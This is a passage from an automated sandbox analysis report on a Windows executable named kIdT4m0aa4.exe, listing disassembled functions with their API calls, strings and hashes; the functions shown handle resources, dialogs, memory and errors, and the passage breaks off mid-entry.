                                                              • Part of subcall function 00CDA6C2: LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                              • Part of subcall function 00CDA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                              • Part of subcall function 00CDA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA73E
                                                              • Part of subcall function 00CDA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                              • Part of subcall function 00CDA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                              • Part of subcall function 00CDA6C2: GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                            • String ID: ]
                                                            • API String ID: 1428510222-3352871620
                                                            • Opcode ID: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                            • Instruction ID: f467d0c27936611222048fad744141ad3d0d4674a3896fb775dc41710923b7fc
                                                            • Opcode Fuzzy Hash: ad008849e1e84113d461527e860f1e63f38dea892afd6105636a8c51435e383b
                                                            • Instruction Fuzzy Hash: 1801C436500601A7C7217B745D09A6F7A79ABC0752F0A0016FA10A7391DF25CE065272
                                                            Function 00CDD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • EndDialog.USER32(?,00000001), ref: 00CDD64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CDD661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CDD675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00CDD684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                            • Instruction ID: 8bd6bbc28ddbc0b97e7c700c149778381c7b3983581466ecb2db8af0815c5f71
                                                            • Opcode Fuzzy Hash: 53faf220effbfdcf91c67346304b5ee9f943dc442f52168cbc13d1275bc57451
                                                            • Instruction Fuzzy Hash: 0E012D33648314BAD2214F659D09F57B76DEB6AB02F110816F306E12D0C6A1DA1797F5
                                                            Function 00CE7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE7E24,00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002), ref: 00CE7EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 73149e56f2b0e333254b4e82934bdd506c0be4b7475aa504e9febbca1508735b
                                                            • Instruction ID: f679381e63df317298eb76b13a65c9f3ee617029937832576dcb1c7da6185e33
                                                            • Opcode Fuzzy Hash: 73149e56f2b0e333254b4e82934bdd506c0be4b7475aa504e9febbca1508735b
                                                            • Instruction Fuzzy Hash: 70F04F31A00258BFCB15ABA1DC09BBEBFB4EB44715F0041AAF805A2260DB309F40CA92
                                                            Function 00CCF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                            • GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                            • Instruction ID: 7f96bdb2a5efab659707fd71b9d336ac5778cd98872596ca605f7cab9007a85c
                                                            • Opcode Fuzzy Hash: 377ab341597340c7665a507bc8b4f9a7425c9ab9850eac5f418c093c24e566e6
                                                            • Instruction Fuzzy Hash: 99E02630801785BECB209F79D80CB217ED46F04700F14882EF1DA93340CAB0D141DB02
                                                            Function 00CE2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: cc8f7dc233e9fe7f275ff906b2ac72d096c3474a8a57212b82294ee08119b45c
                                                            • Instruction ID: 295195b47ea4778bb7cecedc7b8f90dbaa315d9ff3c0a9f332f1c8745914a209
                                                            • Opcode Fuzzy Hash: cc8f7dc233e9fe7f275ff906b2ac72d096c3474a8a57212b82294ee08119b45c
                                                            • Instruction Fuzzy Hash: 9151F572600296AFEB298F16DC45B7AB7A9FF14310F34412DEE16472A1D771EE80E790
                                                            Function 00CEBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00CEBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CEBF5C
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CEBF82
                                                            • _free.LIBCMT ref: 00CEBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CEBFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                            • Instruction ID: 8c4043415e66c6fa6827c4c67a8fd431d70be9de0a163b5fc7a4104fdde0839d
                                                            • Opcode Fuzzy Hash: 970310c8a2e49b5fe8c78250903b785cf4f676521761b80e7ccdd641dc74dff2
                                                            • Instruction Fuzzy Hash: 5601F27A6012917F27212AFB5C8DE7F7A6DEEC2BA03254129F908D3200EF60CE01D5B1
                                                            Function 00CE9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00CE91AD,00CEB188,?,00CE9813,00000001,00000364,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE986E
                                                            • _free.LIBCMT ref: 00CE98A3
                                                            • _free.LIBCMT ref: 00CE98CA
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE98D7
                                                            • SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE98E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: c8bb40283c65e51d808276a886e0abcb2764effaaa267eb84f4e898a98b32d47
                                                            • Instruction ID: ac248acbc2ea9a7882ee85b15383301b9dabeb8db4894825fff335374fa8b23f
                                                            • Opcode Fuzzy Hash: c8bb40283c65e51d808276a886e0abcb2764effaaa267eb84f4e898a98b32d47
                                                            • Instruction Fuzzy Hash: FD01F4361446C17BC23223676C85B3F252DDFD3774B250136F525921F2EE748E05A166
                                                            Function 00CD0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD11CF: ResetEvent.KERNEL32(?), ref: 00CD11E1
                                                              • Part of subcall function 00CD11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CD11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CD0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 00CD0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 00CD0F54
                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F60
                                                            • CloseHandle.KERNEL32(?), ref: 00CD0F6C
                                                              • Part of subcall function 00CD0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CD1206,?), ref: 00CD0FEA
                                                              • Part of subcall function 00CD0FE4: GetLastError.KERNEL32(?), ref: 00CD0FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 7b42f802de7b3d92642bf5d159e101b92e0495e0dbd144e4d0399e7c3dbb7ee4
                                                            • Instruction ID: 69bc1a2d8e147d72c3519467edd160327076d1944e786d843cb0dbd43cc5539f
                                                            • Opcode Fuzzy Hash: 7b42f802de7b3d92642bf5d159e101b92e0495e0dbd144e4d0399e7c3dbb7ee4
                                                            • Instruction Fuzzy Hash: 71015271500744FFC7229B64DC84FDAFBA9FB08710F10092AF26B92160CB757A45DA55
                                                            Function 00CEC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00CEC817
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CEC829
                                                            • _free.LIBCMT ref: 00CEC83B
                                                            • _free.LIBCMT ref: 00CEC84D
                                                            • _free.LIBCMT ref: 00CEC85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                            • Instruction ID: 5c0c0e216d8651f804d26467eebcd25c89a02ebff33d4f783bd9cb9e3c5d9bf7
                                                            • Opcode Fuzzy Hash: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                            • Instruction Fuzzy Hash: 54F09632500291ABC734DB6AF9C5E1B73EABB00B147580819F11CD75A2CF70FE80CA51
                                                            Function 00CD1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CD1FE5
                                                            • _wcslen.LIBCMT ref: 00CD1FF6
                                                            • _wcslen.LIBCMT ref: 00CD2006
                                                            • _wcslen.LIBCMT ref: 00CD2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CCB371,?,?,00000000,?,?,?), ref: 00CD202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                            • Instruction ID: 3f29670ca517987d33570b52eb38ec9c3ead43cd6d3289fcf1ecf6db1f3aba69
                                                            • Opcode Fuzzy Hash: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                            • Instruction Fuzzy Hash: C7F03033008094BFCF265F52EC09DCE7F26EB54770B118416F61A5B061CB72E661E6D0
                                                            Function 00CE8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE891E
                                                              • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                              • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                            • _free.LIBCMT ref: 00CE8930
                                                            • _free.LIBCMT ref: 00CE8943
                                                            • _free.LIBCMT ref: 00CE8954
                                                            • _free.LIBCMT ref: 00CE8965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                            • Instruction ID: 6fe375846a9ec809a7d2ba10b99151e87068a9b93c8fa5f4a5b083538cc18722
                                                            • Opcode Fuzzy Hash: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                            • Instruction Fuzzy Hash: 8AF0DA72810767EB87666F15FC0253D3BA2FB347253050606F518D67B2CB328A46EBA6
                                                            Function 00CD15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: 88cec39c72c5283f98272d626c4f5310bfb5ee1aa8a00634171d1e3466916dd4
                                                            • Instruction ID: c5e3a6082581030df05f3c06fb84e5ce5b04b4cf127bc6fbaaa8cbc8ddf14a7e
                                                            • Opcode Fuzzy Hash: 88cec39c72c5283f98272d626c4f5310bfb5ee1aa8a00634171d1e3466916dd4
                                                            • Instruction Fuzzy Hash: C4515B31288304F6F6216A918D46F367265EB05B00F2D450BFF96A46F1D9B2E912F71B
                                                            Function 00CE7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kIdT4m0aa4.exe,00000104), ref: 00CE7FAE
                                                            • _free.LIBCMT ref: 00CE8079
                                                            • _free.LIBCMT ref: 00CE8083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\kIdT4m0aa4.exe
                                                            • API String ID: 2506810119-549195003
                                                            • Opcode ID: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                            • Instruction ID: 387d927f480fabf4b5090ee5ed7348c62a5aef3065347b6474192da343cc20bc
                                                            • Opcode Fuzzy Hash: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                            • Instruction Fuzzy Hash: 9631BF71A00298AFCB21DF9ADC80DAEBBBCEF94310F104166F91897211DB718E49DB61
                                                            Function 00CE31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE31FB
                                                            • _abort.LIBCMT ref: 00CE3306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
